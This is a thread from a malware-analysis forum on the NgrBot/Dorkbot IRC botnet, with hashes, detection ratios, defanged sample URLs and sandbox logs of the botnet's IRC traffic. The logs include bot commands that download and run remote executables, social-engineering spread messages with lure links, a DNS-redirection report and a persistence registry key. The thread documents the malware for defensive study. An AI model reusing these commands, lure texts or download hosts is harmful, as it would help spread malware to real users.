A forum for reverse engineering, OS internals and malware analysis 

NgrBot (aka Win32/Dorkbot.gen!A)

Forum for analysis and discussion about malware.

Re: NgrBot (aka Win32/Dorkbot.gen!A)

 #10870  by EX!
 Fri Jan 06, 2012 12:52 pm
Dorkbot.

VbCrypt

http://www.virustotal.com/file-scan/rep ... 1325853514

File name: RecargaMovistarGratuita.exe
Submission date: 2012-01-06 12:38:34 (UTC)
Current status: finished
Result: 4 /43 (9.3%)

http://camas.comodo.com/cgi-bin/submit? ... da160d208f

hxxp://www.antiquitebonton.it/Movistar.com.pe/ ... atuita.exe
Attachments
password = infected
(100.27 KiB) Downloaded 59 times

Re: NgrBot (aka Win32/Dorkbot.gen!A)

 #10872  by rkhunter
 Fri Jan 06, 2012 2:35 pm
EX! wrote:Dorkbot.
IRC conversation (links were modified)
From ANUBIS:1030 to 199.193.252.177:5236
Nick: n{AT|XPa}aqfvbvm
Username: aqfvbvm
Server Pass: ROCKR
Joined Channel: #getlist
Joined Channel: #ROCK with Password ngrBot
Joined Channel: #rockspread
Channel Topic for Channel #getlist: ",dl hxxp://www.antiquitebonton.it/wp-content/plugi ... extfud.exe 7603F394EE858ED0B698AD465B6FE9BA"
Channel Topic for Channel #rockspread: ",msn.int 5 | ,http.int 5 | ,msn.set esta foto de hugo chavez agonizando es realmente impactante hxxp://www.antiquitebonton.it/IMG00359268.JPG XD | ,http.set esta foto de hugo chavez agonizando es realmente impactante hxxp://www.antiquitebonton.it/IMG00359268.JPG XD"
Channel Topic for Channel #ROCK: ",mdns hxxp://www.antiquitebonton.it/wp-content/plugi ... s/dodo.txt | ,up hxxp://www.antiquitebonton.it/wp-content/plugi ... jmrlzz.exe D0D4980CCD06D87184D3A03D866EA388 | ,s | ,j #rockspread | ,j #getlist"
Private Message to Channel #rockspread: "[HTTP]: Updated HTTP spread interval to "5""
Private Message to Channel #rockspread: "[MSN]: Updated MSN spread message to "esta foto de hugo chavez agonizando es realmente impactante hxxp://www.antiquitebonton.it/IMG00359268.JPG XD |""
Private Message to Channel #rockspread: "[HTTP]: Updated HTTP spread message to "esta foto de hugo chavez agonizando es realmente impactante hxxp://www.antiquitebonton.it/IMG00359268.JPG XD""
Private Message to Channel #rockspread: "[MSN]: Updated MSN spread interval to "5""
Private Message to Channel #ROCK: "[DNS]: Blocked 0 domain(s) - Redirected 28 domain(s)"
HTTP
From ANUBIS:1028 to 199.15.234.7:80 - [api.wipmania.com]
Request: GET /
Response: 200 "OK"
From ANUBIS:1031 to 81.31.145.6:80 - [www.antiquitebonton.it]
Request: GET /wp-content/plugins/updates/dodo.txt
Response: 200 "OK"

Re: NgrBot (aka Win32/Dorkbot.gen!A)

 #11166  by EX!
 Fri Jan 20, 2012 3:26 pm
#Dorkbot

https://www.virustotal.com/file/9793198 ... 327071556/



SHA256: 97931980765cce2d6bb26dbf109ad9a341f48127807b36ca36e835c88dab27a7
Detection ratio: 9 / 43


hxxp://www.jdkim.com//bbs/data/date/24upjmrlzz.exe
hxxp://www.endenter.com/wp-content/video.Faceb ... esnuda.exe
hxxp://noticiasyfarandula.com/IMG00359268.JPG/IMG00359268.JPG.exe



PRIVMSG #rockspread :[HTTP]: Updated HTTP spread message to "mira esta foto del accidente de messi hxxp://noticiasyfarandula.com/IMG00359268.JPG su auto quedo destrozado |"
PRIVMSG #rockspread :[MSN]: Updated MSN spread message to "mira esta foto del accidente de messi hxxp://noticiasyfarandula.com/IMG00359268.JPG su auto quedo destrozado"
PRIVMSG #ROCK :[d="hxxp://www.jdkim.com//bbs/data/date/24upjmrlzz.exe" s="116236 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Wcxaxw.exe" - Download retries: 0
NICK n{US|XPa}nfiydcb
USER nfiydcb 0 0 :nfiydcb
JOIN #ROCK ngrBot
JOIN #rockspread
JOIN #US
PRIVMSG #rockspread :[HTTP]: Updated HTTP spread interval to "5"
PRIVMSG #rockspread :[MSN]: Updated MSN spread interval to "5"
884288858ff489c4279c293eb

:D
Attachments
pwd = infected
(101.38 KiB) Downloaded 52 times

Re: NgrBot (aka Win32/Dorkbot.gen!A)

 #11550  by EX!
 Sat Feb 11, 2012 12:06 am
#DorkBot

VT

https://www.virustotal.com/file/5b2f9dd ... 328914829/

SHA256: 5b2f9ddca23818ce79113d1bab8f8ccd4a1cafbd5d7710b01ed7133cbe97fe75
Nombre: nr.exe
Detecciones: 1 / 43

nr.exe packed by FLY-CODE

Pharming
hxxp://jjij.in/DNS.txt


PASS secret
NICK n{AR|XPa}cnrsibx
USER cnrsibx 0 0 :cnrsibx

[10/02/2012 20:54:11:472]
:001 get.lost
002 002 002
003 003 003
004 004 004
005 005 005
005 005 005
005 005 005
PING 422 MOTD

[10/02/2012 20:54:11:472]
JOIN #bots priv8s

[10/02/2012 20:54:11:683]
:n{AR|XPa}cnrsibx!cnrsibx@190.172.96.15 JOIN :#bots
:get.lost 332 n{AR|XPa}cnrsibx #bots :!s
:get.lost 333 n{AR|XPa}cnrsibx #bots alive 1328908290

[10/02/2012 20:54:11:683]
JOIN #AR

[10/02/2012 20:54:11:893]
:n{AR|XPa}cnrsibx!cnrsibx@xxx.xxx.xxx.xxxJOIN :#AR
Attachments
passwrd = infected
(78.11 KiB) Downloaded 56 times

Re: NgrBot (aka Win32/Dorkbot.gen!A)

 #11698  by EX!
 Sun Feb 19, 2012 8:05 pm
#DorkBot

Detection ratio: 0 / 43


SHA256: d6a07c7c72f838bf598f6f80ed24bd9a84035abc58dc92dea2844786dcaea3c1



https://www.virustotal.com/file/d6a07c7 ... /analysis/


work with threads.

IsDebuggerPresent
7C813123 > 64:A1 18000000 MOV EAX,DWORD PTR FS:[18]
7C813129 8B40 30 MOV EAX,DWORD PTR DS:[EAX+30]
7C81312C 0FB640 02 MOVZX EAX,BYTE PTR DS:[EAX+2]
HKU\S-1-5-21-329068152-764733703-1708537768-500\Software\Microsoft\Windows\CurrentVersion\Run\© Microsoft Real Time Media Stack: "C:\Windows\Temp\System\ntvdmd.exe"
HKU\S-1-5-21-329068152-764733703-1708537768-500\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\Administrador\Plantillas\explorer.exe: "explorer"
HKU\S-1-5-21-329068152-764733703-1708537768-500\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Windows\Temp\System\ntvdmd.exe: "Microsoft Unified Communications Client API DLL"
HKU\S-1-5-21-329068152-764733703-1708537768-500\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Windows\Temp\System\UccApi.exe: "UccApi"
Attachments
pass = infected
(143.43 KiB) Downloaded 60 times
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 8
 Return to “Malware”